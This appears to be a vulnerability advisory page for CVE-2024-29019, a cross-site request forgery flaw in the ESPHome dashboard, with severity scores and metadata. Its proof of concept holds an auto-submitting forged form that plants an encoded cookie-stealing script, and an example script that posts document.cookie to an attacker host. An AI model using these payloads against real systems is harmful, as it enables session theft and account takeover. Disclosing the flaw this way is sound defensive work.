logo

Advisories

Weaknesses

Fixes

Requirements

Compliance

CVE-2024-29019 esphome

Package

Manager: pip
Name: esphome
Vulnerable Version: >=2023.12.9 <2024.3.0

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N

EPSS: 0.00055 pctl0.17068

Details

ESPHome vulnerable to Authentication bypass via Cross site request forgery ### Summary API endpoints in dashboard component of ESPHome version 2023.12.9 (command line installation) are vulnerable to Cross-Site Request Forgery (CSRF) allowing remote attackers to carry out attacks against a logged user of the dashboard to perform operations on configuration files (create, edit, delete). ### Details It is possible for a malicious actor to create a specifically crafted web page that triggers a cross site request against ESPHome, this allows bypassing the authentication for API calls on the platform. ### PoC An example of malicious web page that abuses this vulnerability: <html> <body> <form action="http://localhost:6052/edit?configuration=poc.yaml" id="#main" method="POST" enctype="text/plain" onsubmit="setTimeout(function () { window.location.reload(); }, 10)"> <input type="hidden" name="&lt;script&gt;&#13;&#10;fetch&#40;&apos;https&#58;&#47;&#47;907zv9yp9u3rjerkiakydpvcr3xulk99&#46;oastify&#46;com&#63;x" value="y&apos;&#44;&#32;&#123;&#13;&#10;method&#58;&#32;&apos;POST&apos;&#44;&#13;&#10;mode&#58;&#32;&apos;no&#45;cors&apos;&#44;&#13;&#10;body&#58;document&#46;cookie&#13;&#10;&#125;&#41;&#59;&#13;&#10;&lt;&#47;script&gt;&#13;&#10;" /> </form> <script> document.forms[0].submit(); </script> <script> </script> </body> </html> In which an attacker creates and weaponizes "poc.yaml" config file containing a cookie exfiltration script and forces the payload triggering visiting the vulnerable page. Example of such script: <script> fetch('https://attacker.domain', { method: 'POST', mode: 'no-cors', body:document.cookie }); </script> ### Impact This vulnerability allows bypassing authentication on API calls accessing configuration file operations on the behalf of a logged user. In order to trigger the vulnerability, the victim must visit a weaponized page. In addition to this, it is possible to chain this vulnerability with GHSA-9p43-hj5j-96h5 (as seen in the PoC) to obtain a complete takeover of the user account.

Metadata

Created: 2024-03-21T16:26:35Z
Modified: 2024-04-11T14:40:50Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/03/GHSA-5925-88xh-6h99/GHSA-5925-88xh-6h99.json
CWE IDs: ["CWE-352"]
Alternative ID: GHSA-5925-88xh-6h99
Finding: F007
Auto approve: 1